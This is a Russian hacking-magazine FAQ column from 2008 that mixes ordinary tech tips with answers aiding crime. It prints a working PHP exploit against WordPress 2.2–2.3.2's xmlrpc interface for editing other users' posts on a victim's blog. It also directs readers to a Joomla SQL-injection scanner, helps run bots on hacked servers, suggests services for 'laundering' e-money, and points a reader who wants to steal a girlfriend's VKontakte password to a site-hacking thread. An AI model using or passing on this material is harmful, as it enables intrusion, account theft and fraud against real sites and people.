Издательский дом ООО "Гейм Лэнд"ЖУРНАЛ ХАКЕР 116, АВГУСТ 2008 г.

FAQ

Маг (icq 884888)

Степан «Step» Ильин (step@gameland.ru)

Хакер, номер #116, стр. 116-138-1

Задавая вопрос, подумай! Не стоит задавать откровенно ламерские вопросы, ответ на которые при определенном желании можно найти и самому. Конкретизируй! Телепатов тут нет, поэтому присылай больше информации.

Q: Как заставить работать ICQ 5.1 без обновления на 6 версию?

A: Очень просто! Надеюсь, ты знаешь, что такое редактор ресурсов Restorator. Запускай его и открывай им файл LiteRes.dll, который обычно располагается в папке C:/Program Files/ICQLite. Найди «где-то слева» папку String, а в ней – строку 14961 с каким-либо значением (например, 1080). Отредактируй это значение на что угодно, например, на 31337, и сохраняй строку. Далее перезапускай аську и наслаждайся ее работой без обновления.

P.S. В качестве небольшого бонуса я расскажу, как пропатчить нашу хекнутую аську от баннеров. Итак, качай рамблер-асю (icq.rambler.ru/files/rambler-icq5_1.exe). Затем качай и устанавливай к ней патч от asechka.ru (asechka.ru/download/alexagf-ICQ5103000r.zip). Хекай библиотеку LiteRes.dll с помощью способа, описанного выше, либо качай уже готовый файл с асечки (asechka.ru/download/rambler/LiteRes.dll). Теперь перезапускай асю и смотри результат :).

Q: А как бы мне объединить Гугл и наиболее популярные хак-форумы в поисках свежих паблик-уязвимостей?

A: За тебя это уже давно сделали :). Сервис, расположенный по адресу http://hacksearch.madnet.name собирает инфу с наиболее известных секьюрити-порталов (antichat.ru, securitylab.ru. www.xakep.ru и т.д.) и вываливает ее для тебя в один серп (выдачу). Цитата с главной страницы хакерского поисковика: «Hack Search – поисковик для хакеров. Эта поисковая система предназначена для качественного поиска информации по порталам, тематика которых – информационная безопасность. Поиск основан на google-данных, а это значит, что вы получите только свежую, достоверную и интересующую именно вас информацию».

Q: Не подскажешь, есть ли новые паблик-эксплойты под популярнейший движок joomla?

A: В привате иногда пробегают темы с предложением о покупке сплойтов под джумлу. Но, как правило, темы оказываются либо фейком, либо эксплойты предназначены для модулей движка. Но зачем платить за то, что есть в паблике? Специально для тебя человек с ником beenudel1986 написал сканер джумлы на модули, уязвимые к скуль-инъекциям. Скачать тулзу можно по адресу beenuarora.com/code/joomsq.py. Для запуска скрипта тебе понадобится интерпретатор python. Запускать сканер необходимо следующим образом (например, для виндового cmd):

«Пуск -> Выполнить -> cmd -> c:/путь/python.exe C:/путь_к_сканеру/joomsq.py www.test.com».

Q: Как обменять (читай: «отмыть») e-деньги по наиболее выгодному курсу?

A: Уже давно появившийся сервис мониторинга обменных пунктов http://obmenniki.com/ предоставляет тебе такую возможность. Приведем немного текста из описания проекта:

«Проект Obmenniki.com – самый простой и удобный способ найти выгодный для Вас курс моментального обмена e-gold, WebMoney, yandex.деньги и других электронных валют.

С августа 2006 года мы осуществляем непрерывный мониторинг автоматических обменных пунктов с хорошей репутацией и резервом на обмен не менее $3000.

Выбирая лучший курс, Вы можете доверять надежности обменных пунктов, включенных в рейтинг. Все представленные обменники имеют высокий Business Level webmoney и достаточные резервы.

Пользуясь нашим сервисом, Вы также можете быть уверены в актуальности всех данных: информация о резервах и курсах участников листинга обновляется ежеминутно».

Q: На моем взломанном дедике/хостинге нельзя юзать функцию php set_time_limit(). Из-за этого мой бот завершает работу через 30 секунд после ее начала. Подскажи, как обойти это ограничение?

A: Совсем недавно обнаруженная «фича» большинства версий интерпретатора PHP позволяет обходить ограничения set_time_limit(). Для небольшого хека тебе необходимо всего лишь прописать в начало скрипта строчку ini_set("max_execution_time", 90000000). Подробности багофичи, а также как написать скрипт виндового шелла, основанного на этой технологии, ты можешь узнать здесь: securityvulns.ru/Sdocument748.html.

Q: Слышал о недавно обнаруженной баге в WordPress, которая позволяет редактировать посты любого юзера, но не понял, как ей пользоваться. Расскажите подробней.

A: Уязвимость работает на движках блога версий 2.2-2.3.2. Для начала тебе необходимо зарегистрироваться на блоге жертвы. После чего создавай PHP-скрипт со следующим содержанием:

<?php

$host = 'blog.com'; // домен

$page = '/wp232/xmlrpc.php'; //путь до скрипта xmlrpc, расположенного в корне блога

$data = '<?xml version="1.0" ?>

<methodCall><methodName>metaWeblog.editPost</methodName><params>

<value><i4>НОМЕР_ПОСТА</i4></value>

<value><string>ИМЯ_ТВОЕГО_ЮЗЕРА</string></value>

<value><string>ПАРОЛЬ_ТВОЕГО_ЮЗЕРА</string></value>

<struct>

<member><name>post_type</name><value>page</value></member>

<member><name>title</name><value><string>ЗАГОЛОВОК_ПОСТА</string></value></member>

<member><name>description</name><string>СОДЕРЖИВОЕ_ПОСТА</string></member>

</struct></params></methodCall>';

$exploited = fsockopen($host, 80, $errorNumber, $errorString);

$requestHeader = " ".$page."HTTP/1.1\r\n";

$requestHeader.= "Host: ".$host."\r\n";

$requestHeader.= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0\r\n";

$requestHeader.= "Content-Type: application/x-www-form-urlencoded\r\n";

$requestHeader.= "Content-Length: ".strlen($data)."\r\n";

$requestHeader.= "Connection: close\r\n\r\n";

$requestHeader.= $data;

fwrite($exploited, $requestHeader );

while (!feof($exploited))

{

print fread($exploited, 4800);

}

?>

Когда скрипт отработает, пост успешно отредактируется. Учти, тут есть один недостаток: хотя вновь отредактированные посты сваливаются в draft, админы блога, видя непонятно откуда взявшийся драфт, меняют его статус на «опубликованный». Дерзай!

Q: У меня есть виндовый дедик. Хочу поднять на нем веб-сервер для своих хакерских целей. Как проще всего это сделать?

A: Легче всего это сделать с помощью «базового пакета веб-разработчика» по прозванию Денвер, который доступен по адресу Denwer.ru. После установки Денвера на дедик (также советую установить дополнительные модули active perl, active python и все расширения PHP5) следуй инструкции:

1. Узнай с помощью утилиты ipconfig, какой IP-адрес у твоего сервера (Пуск -> Выполнить -> cmd -> ipconfig). После запуска утилиты ты увидишь что-то типа:

DNS-суффикс этого подключения . . :

IP-адрес. . . . . . . . . . . . : 192.168.0.49

Маска подсети . . . . . . . . . . : 255.255.255.0

Основной шлюз . . . . . . . . . . : 192.168.0.1

В данном случае внешний IP-адрес машины в локальной сети — 192.168.0.49. Его-то мы и возьмем за константу.

2. Тебе необходимо разрешить подключения с внешних машин во всех файрволах. Я объясню, как это сделать в брандмауэре Винды. Открывай «Пуск -> Панель управления -> Брандмауэр Windows». Переходи на вкладку «Исключения» и нажимай кнопку «Добавить порт». В поле «Имя» вводи IP-адрес твоего дедика (тот самый, из ipconfig), а в поле «Номер порта» укажи 80.

3. Теперь создавай в веб-директории Денвера папку с IP-адресом твоего сервера (например, Z:/home/192.168.0.49/www). Перезапускай Денвер и пользуйся своим дедиком извне.

P.S. Больше подробностей и нюансов ищи на www.denwer.ru/faq/shared.html.

Q: Как высчитать Google PageRank ресурса? Сколько необходимо ссылок с более низким PR, чтобы получить более высокий PR?

A: Вот небольшая табличка тебе в помощь: http://www.seo-fakten.de/PageRank-Kalkulationstabelle.html. Для примера, чтобы получить PageRank 7, нужно:

-508277 страниц с PR=1;

-92414 страниц с PR=2;

-16803 страниц с PR=3;

-3055 страниц с PR=4;

-555 страниц с PR=5;

-100,992 страниц с PR=6;

-18,362 страниц с PR=7;

-3,339 страниц с PR=8;

-0,607 страниц с PR=9;

-0,110 страниц с PR=10;

Q: Обожаю ресурс vkontakte.ru. Как бы мне увести пароль моей подружки или как-нибудь навредить нужному юзеру?

A: Хотя я и не люблю социальные сети, но ответить на твой вопрос придется :). Специально на тему разнообразного недокументированного использования Контакта на форуме античата создан топик forum.antichat.ru/thread45578.html. Процитирую начальные слова из него:

«Привет, котятки! Сегодня мы попробуем заняться паразитизмом на довольно крупном сервисе vkontakte.ru. Сервис страдает от огромного количества всевозможных проблем с безопасностью и просто багов. Рассмотрим пару самых занятных багов, может быть, напишем флудер/спаммер».

А вот – основные пункты топика, посвященные взлому Контакта:

  1. Занимательный javascript
  2. Проблемы с безопасностью
  3. Многопоточный флудер

Также в ответах к теме ты сможешь увидеть множество других багов.

P.S. На античате очень много топиков, посвященных vkontakte.ru. После прочтения того, который я описал выше, советую заюзать поиск на форуме.

Q: Покупаю недешевый домен с высоким PR. Как бы мне проверить PR этого домена на склейку?

A: Как известно, склейка – это PR, полученный одним доменом после переадресации на другой, с более высоким PR. Для проверки на склейку существует множество разнообразных сервисов. Вот некоторые из них:

  1. http://www.be1.ru/services/stat – проверка наполовину ручная;
  2. http://seocheck.net – позволяет проверять склейку в автоматическом режиме и PR по дата-центрам;
  3. http://checkpagerank.net – производит проверку в автоматическом режиме.

Но обычно все SEO-профессионалы советуют проверять домен на склейку вручную. Делается это, если рассказывать в общих чертах, так:

  1. Проверь кэш Google по нескольким дата-центрам.
  2. Задай запрос info:aaa.org и убедись, что показываемая информация относится именно к этому домену.
  3. Тщательно проверяй количество и качество обратных ссылок на сайт. Если по информации того же Yahoo домен не имеет обратных ссылок, то очевидно, что PageRank взять ему было неоткуда.

Q: В офисе не разрешают устанавливать софт, приходится юзать Internet Explorer. Как прикрутить к нему проверку орфографии?

A: Голый IE никуда не годится, но если прикрутить к нему аддон IE7Pro (www.ie7pro.com), то можно выжать из него максимум. Во-первых, появится затребованная тобой проверка орфографии. Во-вторых, дополнительные возможности работы с вкладками (к счастью, хотя бы они реализованы в браузере по умолчанию). В-третьих, синхронизация закладок и управление сессиями.

Q: Как поднять WebDAV в Apache 2 под Windows?

A: Приведу решение в стиле HOWTO:

1. Скачивается и устанавливается Apache с сайта apache.org;

2. В конфиге httpd.conf раскомментируем строки:

LoadModule dav_module modules/mod_dav.so

LoadModule dav_fs_module modules/mod_dav_fs.so

3. В тот же самый конфигурационный файл httpd.conf добавляем:

DavLockDB C:/webdavdb (папка должна существовать, используется для временных файлов)

DAVMinTimeout 600

BrowserMatch "Microsoft Data Access Internet Publishing Provider" redirect-carefully

BrowserMatch "MS FrontPage" redirect-carefully

BrowserMatch "^WebDrive" redirect-carefully

BrowserMatch "^WebDAVFS/1.[0123]" redirect-carefully

BrowserMatch "^gnome-vfs/1.0" redirect-carefully

BrowserMatch "^XML Spy" redirect-carefully

BrowserMatch "^Dreamweaver-WebDAV-SCM1" redirect-carefully

Alias /test C:/wd

AllowOverride None

Order allow,deny

Allow from all

DAV On

AuthType Basic

AuthName "WebDAV Restricted"

AuthUserFile C:/test.pass

Require user webdav

Замечу, что в test.pass в каждой строке содержится имя:пароль (через двоеточие) в открытом виде.

4. При доступе из Windows XP к папке WebDAV может возникнуть проблема – Windows передает для авторизации не просто имя пользователя, а домен\имя. Естественно, сервер его не пропускает. Самое простое решение: добавить номер порта в адресную строку при подключении из Windows XP. Например, так: http://webdav.myserser.ru:80/test.

Q: У меня не получается установить Fedora 9 c диска ][. Программаустановки прерывает работу с ошибкой на одном из этапов. В чем проблема? И как все-таки установить ОС?

A: К сожалению, даже у самых известных дистрибутивов могут оказаться ошибки в релизах. Впрочем, исправить проблему несложно. Предлагаю два варианта действий:

1. Выполнить установку системы в графическом режиме на русском языке, не изменяя список программных пакетов по умолчанию.

2. Выполнить установку системы в графическом режиме на английском языке, указав необходимость поддержки русского языка. После завершения установки:

  • загрузи систему;
  • пройди шаги мастера первоначальной настройки и, войдя в систему, запусти программу system-config-language из окна терминала или Main Menu -> System -> Administration -> Language;
  • выбери Русский (Russian) язык.

После перезагрузки основным языком системы будет установлен русский.

Q: Купил ][акер за май, читаю FAQ. В «посте» о переносе почтовой базы с компа на Gmail меня удивило, что ты написал, что нет на данный момент решения, позволяющего перенести базу писем из The Bat! на Gmail. На самом деле, оно есть. И вот ответ.

A: Придется немного поработать ручками. Делается это так: для The Bat! нужно экспортировать все папки писем в формате Unix-ящика, удалить расширение (.mbx) и скопировать их в папку Thunderbird, в которой он хранит базу писем. После чего стоит запустить Thunderbird и пройтись по всем «новым» папкам. Далее можно выгружать письма на Gmail с помощью программы Google Email Uploader. (Спасибо за дополнение, - Прим. редакции)

Q: Как прочитать данные с жесткого диска, отформатированного для использования на Mac?

A: Самый лучший вариант – воспользоваться специальной утилитой HFSExplorer (http://hem.bredband.net/catacombae/hfsx.html). Так ты получишь полный доступ к диску, который Windows не понимает в силу своей религии. Для работы этой замечательной тулзы понадобится Java 2 Runtime Environment версии 1.5.0 и старше. Если во время запуска программа вылетит с ошибкой, указав на отсутствие файла MSVCR71.dll, скопируй его из <каталог с установленной Java >\bin в папку HFSExplorer.

Содержание
загрузка...
Журнал Хакер #151Журнал Хакер #150Журнал Хакер #149Журнал Хакер #148Журнал Хакер #147Журнал Хакер #146Журнал Хакер #145Журнал Хакер #144Журнал Хакер #143Журнал Хакер #142Журнал Хакер #141Журнал Хакер #140Журнал Хакер #139Журнал Хакер #138Журнал Хакер #137Журнал Хакер #136Журнал Хакер #135Журнал Хакер #134Журнал Хакер #133Журнал Хакер #132Журнал Хакер #131Журнал Хакер #130Журнал Хакер #129Журнал Хакер #128Журнал Хакер #127Журнал Хакер #126Журнал Хакер #125Журнал Хакер #124Журнал Хакер #123Журнал Хакер #122Журнал Хакер #121Журнал Хакер #120Журнал Хакер #119Журнал Хакер #118Журнал Хакер #117Журнал Хакер #116Журнал Хакер #115Журнал Хакер #114Журнал Хакер #113Журнал Хакер #112Журнал Хакер #111Журнал Хакер #110Журнал Хакер #109Журнал Хакер #108Журнал Хакер #107Журнал Хакер #106Журнал Хакер #105Журнал Хакер #104Журнал Хакер #103Журнал Хакер #102Журнал Хакер #101Журнал Хакер #100Журнал Хакер #099Журнал Хакер #098Журнал Хакер #097Журнал Хакер #096Журнал Хакер #095Журнал Хакер #094Журнал Хакер #093Журнал Хакер #092Журнал Хакер #091Журнал Хакер #090Журнал Хакер #089Журнал Хакер #088Журнал Хакер #087Журнал Хакер #086Журнал Хакер #085Журнал Хакер #084Журнал Хакер #083Журнал Хакер #082Журнал Хакер #081Журнал Хакер #080Журнал Хакер #079Журнал Хакер #078Журнал Хакер #077Журнал Хакер #076Журнал Хакер #075Журнал Хакер #074Журнал Хакер #073Журнал Хакер #072Журнал Хакер #071Журнал Хакер #070Журнал Хакер #069Журнал Хакер #068Журнал Хакер #067Журнал Хакер #066Журнал Хакер #065Журнал Хакер #064Журнал Хакер #063Журнал Хакер #062Журнал Хакер #061Журнал Хакер #060Журнал Хакер #059Журнал Хакер #058Журнал Хакер #057Журнал Хакер #056Журнал Хакер #055Журнал Хакер #054Журнал Хакер #053Журнал Хакер #052Журнал Хакер #051Журнал Хакер #050Журнал Хакер #049Журнал Хакер #048Журнал Хакер #047Журнал Хакер #046Журнал Хакер #045Журнал Хакер #044Журнал Хакер #043Журнал Хакер #042Журнал Хакер #041Журнал Хакер #040Журнал Хакер #039Журнал Хакер #038Журнал Хакер #037Журнал Хакер #036Журнал Хакер #035Журнал Хакер #034Журнал Хакер #033Журнал Хакер #032Журнал Хакер #031Журнал Хакер #030Журнал Хакер #029Журнал Хакер #028Журнал Хакер #027Журнал Хакер #026Журнал Хакер #025Журнал Хакер #024Журнал Хакер #023Журнал Хакер #022Журнал Хакер #021Журнал Хакер #020Журнал Хакер #019Журнал Хакер #018Журнал Хакер #017Журнал Хакер #016Журнал Хакер #015Журнал Хакер #014Журнал Хакер #013Журнал Хакер #012Журнал Хакер #011Журнал Хакер #010Журнал Хакер #009Журнал Хакер #008Журнал Хакер #007Журнал Хакер #006Журнал Хакер #005Журнал Хакер #004Журнал Хакер #003Журнал Хакер #002Журнал Хакер #001